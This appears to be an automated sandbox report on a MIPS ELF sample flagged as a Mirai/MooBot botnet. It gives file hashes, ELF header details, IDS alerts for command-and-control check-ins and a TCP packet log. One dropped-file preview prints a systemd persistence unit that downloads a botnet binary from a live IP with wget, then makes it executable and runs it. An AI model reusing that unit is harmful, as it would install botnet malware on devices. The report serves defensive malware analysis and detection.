COMBAHTONcombahtonGmbHDE	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	7QiAmg58Jk.exe	Get hash	malicious	Metasploit, Meterpreter, Xmrig	Browse	194.59.31.31
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	194.59.31.225
	9YOOBuBZtj.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.59.30.201

Process:	/tmp/na.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	297
Entropy (8bit):	5.057113383448013
Encrypted:	false
SSDEEP:	6:z80WuKyRZAMzdK+ann0RJ5R0J/K+GWRo3N+GWRuwuOp+GWRQCdUO9LQmWA4Rv:zNRZAOK+aniRi/K+GWRg+GWRuwjp+GWo
MD5:	4718C05A608A62895CB8F8FE350D3FB6
SHA1:	FFB5174F12EB8F312161E10163CBF843E0A19B2C
SHA-256:	1992117801CFE56513A1AFA968434D0FAC7209B48E6BADF6D34EC413EA390D66
SHA-512:	B4712F49CF45125D0105877E2A973C7363850A991D22FE72454644C25A5932097BC00AA08A4A36F81C601106AF5D30027BD181E7512FC7D509B7D7AA8EBD09E1
Malicious:	false
Reputation:	low
Preview:	[Unit].Description=Custom Sech Binary.After=network.target..[Service].ExecStart=/usr/bin/wget -O /tmp/bolu http://91.200.103.117/bolubotnetmips.ExecStartPost=/bin/chmod +x /tmp/bolu.ExecStartPost=/tmp/bolu (null).ExecStartPost=rm -rf /tmp/bolu.Restart=always..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.EZS4Br (deleted)

Download File

Process:	/tmp/na.elf
File Type:	data
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.8100810205217304
Encrypted:	false
SSDEEP:	3:TgBDlT1N:TgB11N
MD5:	2E8B62CD5B9D6203300E1A0F79554430
SHA1:	B6FC563BCA171C6DFA5A420C367F090C08635F4D
SHA-256:	54E95E1B4FCA83E6C469DA79E05EC42CB5F190B5731F28A9DFF280136B7DCFA6
SHA-512:	81AA2A256AB3B2318A60A089336AB73F5257EF7F292F18A37EC069D7FDE400763D7BFA3D89586B610C80715A2443849E679559EB14DBF7C769869AA908067541
Malicious:	false
Reputation:	low
Preview:	/tmp/na.elf./tmp/nwlrbbmqbh

Static File Info

General

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.085823091564988
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	na.elf
File size:	186'872 bytes
MD5:	ecffaf9ddeb2137988036bf8d7153b67
SHA1:	834a8cce9907e2ce918040cef2944f5d1dcb0d08
SHA256:	1afd5b2da3e7a198208d882e61c3c651b7718ce9d67a4c6f0c2c882492f7eb41
SHA512:	10b49e818b49627df7525d832d2e69ccd6d970b94df3dfd43880698076b5e84a0bc5b9103a037b4ee4e4086fac3a97df2abe7436cf9f47acb65aabfd4c3c9749
SSDEEP:	3072:vPriURH2E8uPFvMLmM1GK2+BH6PvaD/8uj7Zy:vjiUR2EpFvMLnLIPq/njty
TLSH:	D704A61E6E228F7DF768873547B78E25975833D626E1D680E1ACC2105E6038E641FFAC
File Content Preview:	.ELF.....................@.`...4.........4. ...(.............@...@...........................F...F....T....<........dt.Q............................<...'.M....!'.......................<...'.L....!... ....'9... ......................<...'.L....!...$....'9W

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	186312
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x25700	0x0	0x6	AX	16
.fini	PROGBITS	0x425820	0x25820	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x425880	0x25880	0x2a30	0x0	0x2	A	16
.ctors	PROGBITS	0x4682b4	0x282b4	0xc	0x0	0x3	WA	4
.dtors	PROGBITS	0x4682c0	0x282c0	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x4682cc	0x282cc	0x144	0x0	0x3	WA	4
.data	PROGBITS	0x468420	0x28420	0x4998	0x0	0x3	WA	32
.got	PROGBITS	0x46cdc0	0x2cdc0	0x9a4	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x46d764	0x2d764	0x4c	0x0	0x10000003	WAp	4
.bss	NOBITS	0x46d7b0	0x2d764	0x8840	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0x12b4	0x2d764	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x2d764	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x282b0	0x282b0	5.4374	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x282b4	0x4682b4	0x4682b4	0x54b0	0xdd3c	1.2074	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T16:28:53.058288+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58430	91.200.103.117	23561	TCP
2024-10-07T16:28:58.707877+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58432	91.200.103.117	23561	TCP
2024-10-07T16:29:03.667039+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58434	91.200.103.117	23561	TCP
2024-10-07T16:29:09.389345+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58436	91.200.103.117	23561	TCP
2024-10-07T16:29:18.398905+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58438	91.200.103.117	23561	TCP
2024-10-07T16:29:27.047574+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58440	91.200.103.117	23561	TCP
2024-10-07T16:29:32.707714+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58442	91.200.103.117	23561	TCP
2024-10-07T16:29:42.335065+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58444	91.200.103.117	23561	TCP
2024-10-07T16:29:49.970562+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58446	91.200.103.117	23561	TCP
2024-10-07T16:30:00.652513+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58448	91.200.103.117	23561	TCP
2024-10-07T16:30:11.483573+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58450	91.200.103.117	23561	TCP
2024-10-07T16:30:19.141822+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58452	91.200.103.117	23561	TCP
2024-10-07T16:30:25.773355+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58454	91.200.103.117	23561	TCP
2024-10-07T16:30:32.421776+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58456	91.200.103.117	23561	TCP
2024-10-07T16:30:43.097400+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58458	91.200.103.117	23561	TCP
2024-10-07T16:30:53.732411+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58460	91.200.103.117	23561	TCP
2024-10-07T16:30:58.403261+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58462	91.200.103.117	23561	TCP
2024-10-07T16:31:04.045222+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58464	91.200.103.117	23561	TCP
2024-10-07T16:31:07.698392+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58466	91.200.103.117	23561	TCP
2024-10-07T16:31:16.376213+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58468	91.200.103.117	23561	TCP
2024-10-07T16:31:21.699517+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58470	91.200.103.117	23561	TCP
2024-10-07T16:31:29.329455+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58472	91.200.103.117	23561	TCP
2024-10-07T16:31:38.374808+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58474	91.200.103.117	23561	TCP
2024-10-07T16:31:44.860656+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58476	91.200.103.117	23561	TCP
2024-10-07T16:31:47.518777+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58478	91.200.103.117	23561	TCP
2024-10-07T16:31:59.490488+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58480	91.200.103.117	23561	TCP
2024-10-07T16:32:05.266675+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58482	91.200.103.117	23561	TCP
2024-10-07T16:32:17.530926+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.14	58484	91.200.103.117	23561	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 16:28:53.045645952 CEST	58430	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:28:53.051034927 CEST	23561	58430	91.200.103.117	192.168.2.14
Oct 7, 2024 16:28:53.051090956 CEST	58430	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:28:53.058288097 CEST	58430	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:28:53.063283920 CEST	23561	58430	91.200.103.117	192.168.2.14
Oct 7, 2024 16:28:54.683202028 CEST	23561	58430	91.200.103.117	192.168.2.14
Oct 7, 2024 16:28:54.683473110 CEST	58430	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:28:54.688465118 CEST	23561	58430	91.200.103.117	192.168.2.14
Oct 7, 2024 16:28:58.700006962 CEST	58432	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:28:58.705019951 CEST	23561	58432	91.200.103.117	192.168.2.14
Oct 7, 2024 16:28:58.705220938 CEST	58432	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:28:58.707876921 CEST	58432	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:28:58.712688923 CEST	23561	58432	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:00.342438936 CEST	23561	58432	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:00.342665911 CEST	58432	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:00.347485065 CEST	23561	58432	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:03.661434889 CEST	58434	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:03.666258097 CEST	23561	58434	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:03.666312933 CEST	58434	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:03.667038918 CEST	58434	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:03.671835899 CEST	23561	58434	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:05.363563061 CEST	23561	58434	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:05.363718987 CEST	58434	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:05.368614912 CEST	23561	58434	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:09.375307083 CEST	58436	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:09.388582945 CEST	23561	58436	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:09.388643980 CEST	58436	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:09.389344931 CEST	58436	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:09.395560980 CEST	23561	58436	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:11.081109047 CEST	23561	58436	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:11.081495047 CEST	58436	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:11.086486101 CEST	23561	58436	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:18.393275023 CEST	58438	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:18.398093939 CEST	23561	58438	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:18.398163080 CEST	58438	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:18.398905039 CEST	58438	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:18.403641939 CEST	23561	58438	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:20.029997110 CEST	23561	58438	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:20.030189037 CEST	58438	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:20.034980059 CEST	23561	58438	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:27.041836977 CEST	58440	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:27.046663046 CEST	23561	58440	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:27.046719074 CEST	58440	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:27.047574043 CEST	58440	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:27.052375078 CEST	23561	58440	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:28.670756102 CEST	23561	58440	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:28.670974016 CEST	58440	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:28.675873041 CEST	23561	58440	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:32.700525045 CEST	58442	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:32.706794977 CEST	23561	58442	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:32.706878901 CEST	58442	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:32.707714081 CEST	58442	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:32.712542057 CEST	23561	58442	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:34.318603992 CEST	23561	58442	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:34.318847895 CEST	58442	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:34.323765039 CEST	23561	58442	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:42.329243898 CEST	58444	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:42.334109068 CEST	23561	58444	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:42.334167004 CEST	58444	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:42.335064888 CEST	58444	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:42.339998007 CEST	23561	58444	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:43.955106974 CEST	23561	58444	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:43.955285072 CEST	58444	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:43.962445974 CEST	23561	58444	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:49.964760065 CEST	58446	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:49.969671011 CEST	23561	58446	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:49.969729900 CEST	58446	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:49.970561981 CEST	58446	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:49.975598097 CEST	23561	58446	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:51.636986971 CEST	23561	58446	91.200.103.117	192.168.2.14
Oct 7, 2024 16:29:51.637180090 CEST	58446	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:29:51.642062902 CEST	23561	58446	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:00.646703959 CEST	58448	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:00.651563883 CEST	23561	58448	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:00.651622057 CEST	58448	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:00.652513027 CEST	58448	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:00.657346010 CEST	23561	58448	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:02.460935116 CEST	23561	58448	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:02.461183071 CEST	58448	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:02.465997934 CEST	23561	58448	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:11.477080107 CEST	58450	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:11.482327938 CEST	23561	58450	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:11.482419014 CEST	58450	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:11.483572960 CEST	58450	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:11.489166975 CEST	23561	58450	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:13.125699997 CEST	23561	58450	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:13.126055956 CEST	58450	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:13.130892992 CEST	23561	58450	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:19.136034012 CEST	58452	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:19.140870094 CEST	23561	58452	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:19.140923977 CEST	58452	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:19.141822100 CEST	58452	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:19.146667957 CEST	23561	58452	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:20.754127979 CEST	23561	58452	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:20.754354000 CEST	58452	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:20.759965897 CEST	23561	58452	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:25.766993046 CEST	58454	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:25.772239923 CEST	23561	58454	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:25.772320986 CEST	58454	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:25.773355007 CEST	58454	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:25.778202057 CEST	23561	58454	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:27.406132936 CEST	23561	58454	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:27.406407118 CEST	58454	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:27.411448956 CEST	23561	58454	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:32.415976048 CEST	58456	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:32.420972109 CEST	23561	58456	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:32.421025991 CEST	58456	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:32.421776056 CEST	58456	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:32.429148912 CEST	23561	58456	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:34.077115059 CEST	23561	58456	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:34.077276945 CEST	58456	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:34.082148075 CEST	23561	58456	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:43.089871883 CEST	58458	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:43.096326113 CEST	23561	58458	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:43.096394062 CEST	58458	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:43.097399950 CEST	58458	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:43.103830099 CEST	23561	58458	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:44.715646029 CEST	23561	58458	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:44.715941906 CEST	58458	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:44.720849037 CEST	23561	58458	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:53.726217031 CEST	58460	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:53.731331110 CEST	23561	58460	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:53.731393099 CEST	58460	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:53.732410908 CEST	58460	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:53.737235069 CEST	23561	58460	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:55.385283947 CEST	23561	58460	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:55.385448933 CEST	58460	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:55.392827034 CEST	23561	58460	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:58.397192955 CEST	58462	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:58.402089119 CEST	23561	58462	91.200.103.117	192.168.2.14
Oct 7, 2024 16:30:58.402143002 CEST	58462	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:58.403260946 CEST	58462	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:30:58.408150911 CEST	23561	58462	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:00.028121948 CEST	23561	58462	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:00.028341055 CEST	58462	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:00.033268929 CEST	23561	58462	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:04.039277077 CEST	58464	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:04.044231892 CEST	23561	58464	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:04.044285059 CEST	58464	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:04.045222044 CEST	58464	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:04.049993992 CEST	23561	58464	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:05.682790041 CEST	23561	58464	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:05.682971954 CEST	58464	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:05.687905073 CEST	23561	58464	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:07.692867994 CEST	58466	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:07.697702885 CEST	23561	58466	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:07.697747946 CEST	58466	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:07.698391914 CEST	58466	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:07.703268051 CEST	23561	58466	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:09.358160973 CEST	23561	58466	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:09.358551025 CEST	58466	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:09.363827944 CEST	23561	58466	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:16.370265007 CEST	58468	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:16.375399113 CEST	23561	58468	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:16.375489950 CEST	58468	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:16.376213074 CEST	58468	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:16.381108046 CEST	23561	58468	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:18.683715105 CEST	23561	58468	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:18.683890104 CEST	58468	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:18.683890104 CEST	58468	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:18.684845924 CEST	23561	58468	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:18.684899092 CEST	58468	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:18.686017036 CEST	23561	58468	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:18.686057091 CEST	58468	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:18.690016985 CEST	23561	58468	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:21.693738937 CEST	58470	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:21.698666096 CEST	23561	58470	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:21.698750973 CEST	58470	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:21.699517012 CEST	58470	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:21.704459906 CEST	23561	58470	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:23.314002991 CEST	23561	58470	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:23.314202070 CEST	58470	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:23.319078922 CEST	23561	58470	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:29.323926926 CEST	58472	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:29.328833103 CEST	23561	58472	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:29.328886032 CEST	58472	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:29.329454899 CEST	58472	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:29.334379911 CEST	23561	58472	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:30.935009003 CEST	23561	58472	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:30.935303926 CEST	58472	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:30.940385103 CEST	23561	58472	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:38.118824005 CEST	58474	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:38.123742104 CEST	23561	58474	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:38.123800993 CEST	58474	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:38.374808073 CEST	58474	23561	192.168.2.14	91.200.103.117
Oct 7, 2024 16:31:38.379622936 CEST	23561	58474	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:39.844716072 CEST	23561	58474	91.200.103.117	192.168.2.14
Oct 7, 2024 16:31:39.844867945 CEST	58474	23561	192.168.2.14	91.200.103.117
